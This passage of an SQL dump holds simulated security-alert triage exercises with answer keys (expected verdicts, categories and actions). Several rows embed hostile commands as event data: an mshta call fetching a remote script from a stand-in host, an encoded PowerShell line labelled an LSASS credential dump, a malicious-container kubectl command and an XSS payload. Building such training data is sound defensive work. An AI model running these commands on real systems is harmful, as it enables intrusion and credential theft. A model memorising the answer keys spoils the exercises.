patterns\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The service account\'s unauthorized use by an external IP suggests hijacking.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2056, 'Prisma Cloud: Unauthorized Kubernetes API Access', 'high', 'Prisma Cloud', 'An unauthorized attempt to access the Kubernetes API server was detected from an external source.', 'Web Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:05:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.60\",\"dst_ip\":\"10.0.0.8\",\"username\":\"unknown\",\"hostname\":\"k8s-api-server\",\"request_body\":\"POST /api/v1/namespaces/default/pods\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP involved in unauthorized API access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"POST /api/v1/namespaces/default/pods\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Attempt to create unauthorized pods\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The external IP\'s unauthorized requests to the API server indicate a potential breach attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2057, 'Wiz: Serverless Function Invocation from Suspicious IP', 'medium', 'Wiz', 'A serverless function was invoked from an IP address known for suspicious activity, suggesting possible abuse.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.55\",\"dst_ip\":\"10.0.1.3\",\"username\":\"function-invoker\",\"hostname\":\"lambda-function\",\"request_body\":\"\",\"command_line\":\"aws lambda invoke --function-name myFunction\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with unauthorized serverless function invocations\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"function-invoker\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"User involved in anomalous invocation patterns\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The invocation from a known suspicious IP suggests potential misuse of serverless functions.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2058, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'A sensitive AWS S3 bucket was accessed from an unauthorized IP address. Possible data exfiltration attempt detected.', 'Data Exfiltration', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:23Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"203.0.113.5\",\"username\":\"unauthorized_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /bucket-name/important-data\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1203 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Username associated with multiple unauthorized access attempts\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"s3.amazonaws.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate AWS S3 endpoint\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Unauthorized IP accessed a sensitive S3 bucket, indicating potential data leak.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2059, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'An IAM user account attempted to escalate privileges using an admin account token. Detected unusual activity patterns.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:34Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"10.0.0.12\",\"username\":\"compromised_user\",\"hostname\":\"azure-portal\",\"request_body\":\"\",\"command_line\":\"az role assignment create --assignee compromised_user --role Contributor\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 654 times for credential stuffing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Username involved in abnormal privilege escalation attempts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee compromised_user --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in privilege escalation attacks\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Compromised user attempted privilege escalation, indicating a potential breach.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2060, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'A GCP service account was used from an unknown IP address to access critical resources. Potential hijacking detected.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:23:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"10.128.0.2\",\"username\":\"service-account@project.iam.gserviceaccount.com\",\"hostname\":\"gcp-project\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account@project.iam.gserviceaccount.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Service account used in abnormal contexts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Unauthorized access to GCP service account detected, suggesting possible hijacking.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2061, 'Prisma Cloud Detection of Unauthorized Kubernetes Access', 'high', 'Prisma Cloud', 'A Kubernetes cluster was accessed by an external IP address not listed in the whitelist. Possible lateral movement attempt.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:50:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"10.1.2.3\",\"username\":\"kube-admin\",\"hostname\":\"k8s-cluster\",\"request_body\":\"\",\"command_line\":\"kubectl exec --kubeconfig /path/to/config\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for unauthorized Kubernetes access\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl exec --kubeconfig /path/to/config\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command linked to unauthorized access attempts\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"External IP accessed Kubernetes cluster, indicating potential lateral movement.\"}', 'Beginner', 'CLOUD', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2062, 'Wiz Detection of Unauthorized Serverless Function Execution', 'medium', 'Wiz', 'An AWS Lambda function executed by an external IP not associated with any known entities. Potential unauthorized access detected.', 'Data Exfiltration', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:35:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.150\",\"dst_ip\":\"10.0.0.5\",\"username\":\"lambda_function_exec\",\"hostname\":\"aws-lambda\",\"request_body\":\"\",\"command_line\":\"aws lambda invoke --function-name sensitiveFunction\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with unauthorized AWS Lambda executions\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"aws lambda invoke --function-name sensitiveFunction\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command associated with unauthorized data access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Unauthorized execution of Lambda function indicating data exfiltration risk.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2063, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'An external IP was observed accessing sensitive data from an S3 bucket. The activity is consistent with data exfiltration attempts.', 'Data Exfil', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP accessing sensitive data indicates a breach attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2064, 'Azure IAM Privilege Escalation Detected', 'high', 'Azure Defender', 'A suspicious privilege escalation was detected in Azure IAM, potentially compromising administrator credentials.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin\",\"hostname\":\"azure.com\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for 1021 brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"High-value target account\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Failed login attempts from a foreign IP suggest a targeted credential compromise.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2065, 'GCP Service Account Hijacking Attempt', 'critical', 'GCP SCC', 'Unusual activity detected from a GCP service account indicating possible hijacking and unauthorized access.', 'Data Exfil', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:35:20Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.67\",\"dst_ip\":\"172.16.0.10\",\"username\":\"gcp-service-account\",\"hostname\":\"cloud.google.com\",\"request_body\":\"\",\"command_line\":\"gsutil cp gs://mybucket/sensitive-data .\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"gsutil cp gs://mybucket/sensitive-data .\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicative of data exfiltration\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The execution of gsutil with an external IP suggests data exfiltration.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2066, 'Prisma Cloud Kubernetes Misconfiguration Exploit', 'high', 'Prisma Cloud', 'A misconfigured Kubernetes cluster was detected and exploited to run unauthorized containers.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:25:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.0.2.123\",\"dst_ip\":\"10.1.2.3\",\"username\":\"kube-admin\",\"hostname\":\"kubernetes.cluster.local\",\"request_body\":\"\",\"command_line\":\"kubectl run malicious-container --image=malicious-image\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP known for exploiting Kubernetes vulnerabilities\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl run malicious-container --image=malicious-image\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to deploy unauthorized containers\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of kubectl to run unauthorized containers indicates lateral movement.\"}', 'Beginner', 'CLOUD', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2067, 'Wiz Serverless Function Exploit Detected', 'high', 'Wiz', 'A serverless function execution was detected with an anomalous and potentially harmful payload.', 'Web Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:50:05Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.44\",\"dst_ip\":\"10.0.3.14\",\"username\":\"lambda-exec\",\"hostname\":\"aws.lambda.com\",\"request_body\":\"<script>alert(\'XSS\')</script>\",\"command_line\":\"node malicious.js\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"<script>alert(\'XSS\')</script>\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"XSS payload detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The presence of an XSS payload in serverless function execution suggests a web attack.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2068, 'AWS GuardDuty Detects S3 Bucket Data Leak Attempt', 'critical', 'AWS GuardDuty', 'An unauthorized data access attempt was detected on an S3 bucket. The source IP belongs to a known malicious actor. Immediate action is required to prevent data exfiltration.', 'Data Exfil', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:23:45Z\",\"event_type\":\"s3_data_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"unauthorized_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive_data\",\"command_line\":\"aws s3 cp s3://bucket_name/sensitive_data .\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Attempted access by unauthorized user\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"aws s3 cp s3://bucket_name/sensitive_data .\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicates potential data exfiltration attempt\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The source IP is known for malicious activities, and the command line indicates an unauthorized data transfer attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2069, 'Azure Defender Detects Unusual IAM Privilege Escalation', 'high', 'Azure Defender', 'A user account attempted to gain privileged access using an unusual method, but the IP address appears to be from an internal range.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:32Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"10.0.0.23\",\"dst_ip\":\"10.0.0.45\",\"username\":\"john.doe\",\"hostname\":\"azure-vm01\",\"command_line\":\"az role assignment create --assignee john.doe --role Contributor\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"IP address belongs to internal network\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"clean\",\"details\":\"User is a known employee with prior authorized access\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity was conducted within the internal network by a known user, indicating a false positive.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2070, 'GCP SCC Alerts on Service Account Hijacking Attempt', 'medium', 'GCP SCC', 'A service account attempted unauthorized access from an unusual IP address, but the IP is from a trusted partner network.', 'Access Anomaly', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:57:18Z\",\"event_type\":\"service_account_access\",\"src_ip\":\"198.51.100.12\",\"dst_ip\":\"172.16.0.5\",\"username\":\"service-account-123\",\"hostname\":\"gcp-service\",\"command_line\":\"gcloud auth activate-service-account --key-file=/path/to/key.json\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"clean\",\"details\":\"IP address belongs to a trusted partner network\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account-123\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"clean\",\"details\":\"Service account regularly used for inter-company data sharing\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The access was mistakenly flagged due to the IP address, which is from a trusted partner network.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2071, 'Prisma Cloud Detects Anomalous Kubernetes Pod Creation', 'medium', 'Prisma Cloud', 'An unexpected Kubernetes pod creation was detected, but it matches a known maintenance script signature.', 'Anomaly Detection', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:12:07Z\",\"event_type\":\"k8s_pod_creation\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.100\",\"username\":\"k8s-admin\",\"hostname\":\"k8s-cluster\",\"command_line\":\"kubectl apply -f maintenance-pod.yaml\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"IP address belongs to internal management network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl apply -f maintenance-pod.yaml\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Procedures\",\"verdict\":\"clean\",\"details\":\"Command matches known maintenance script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly_detection\",\"analysis_notes\":\"The pod creation event aligns with a scheduled maintenance activity, indicating a false positive.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2072, 'Wiz Detects Potential Serverless Function Abuse', 'high', 'Wiz', 'An unusual spike in serverless function executions was detected, originating from an internal source. The activity matches a stress test pattern.', 'Anomaly Detection', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T17:39:29Z\",\"event_type\":\"serverless_execution\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"192.168.2.60\",\"username\":\"devops-team\",\"hostname\":\"serverless-env\",\"command_line\":\"invoke stress-test\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal DevOps team\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"invoke stress-test\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Procedures\",\"verdict\":\"clean\",\"details\":\"Command matches stress test procedure\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly_detection\",\"analysis_notes\":\"The serverless function spike was part of a planned stress test by the DevOps team, confirming a false positive.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2073, 'Credential Dump from LSASS via PowerShell Encoded Command', 'critical', 'CrowdStrike', 'A PowerShell script was executed with an encoded command targeting LSASS to dump credentials. This activity is indicative of a sophisticated attack aiming for credential harvesting.', 'Credential Dumping', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"Workstation-01\",\"command_line\":\"powershell.exe -enc aW1wb3J0LU1vZHVsZSBTZWN1cml0eS5OZXQ7IFtTeXN0ZW0uTmV0LlNlcnZpY2VQcm9jZXNzXTo6R2V0UHJvY2Vzc2VzKCJsc2FzcyIpLmV4aXQ=\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc aW1wb3J0LU1vZHVsZSBTZWN1cml0eS5OZXQ7IFtTeXN0ZW0uTmV0LlNlcnZpY2VQcm9jZXNzXTo6R2V0UHJvY2Vzc2VzKCJsc2FzcyIpLmV4aXQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as a PowerShell command used in credential dumping attacks.\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The encoded PowerShell command is used to dump credentials from LSASS, a known technique employed by attackers for credential theft.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2074, 'Lateral Movement Detected via WMI Execution', 'high', 'SentinelOne', 'Suspicious WMI activity detected as an attacker attempts to move laterally between systems using WMI commands.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:45:13Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"192.168.1.8\",\"username\":\"administrator\",\"hostname\":\"Server-03\",\"command_line\":\"wmic /node:192.168.1.8 process call create \\\"cmd.exe /c whoami\\\"\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:192.168.1.8 process call create \\\"cmd.exe /c whoami\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI command used for lateral movement within the network.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"WMI is commonly used for lateral movement by adversaries to execute commands on remote hosts without dropping files.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2075, 'Fileless Malware Detected via MSHTA Execution', 'critical', 'Carbon Black', 'A fileless malware attack was detected using MSHTA to execute a malicious script in memory, bypassing traditional file-based detections.', 'Malware', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.20\",\"username\":\"mbrown\",\"hostname\":\"Workstation-07\",\"command_line\":\"mshta.exe http://malicious.site/script.hta\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.site/script.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious HTA script used for fileless malware attacks.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of MSHTA to execute a remote script is indicative of fileless malware, which executes in memory and often evades file-based detection methods.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
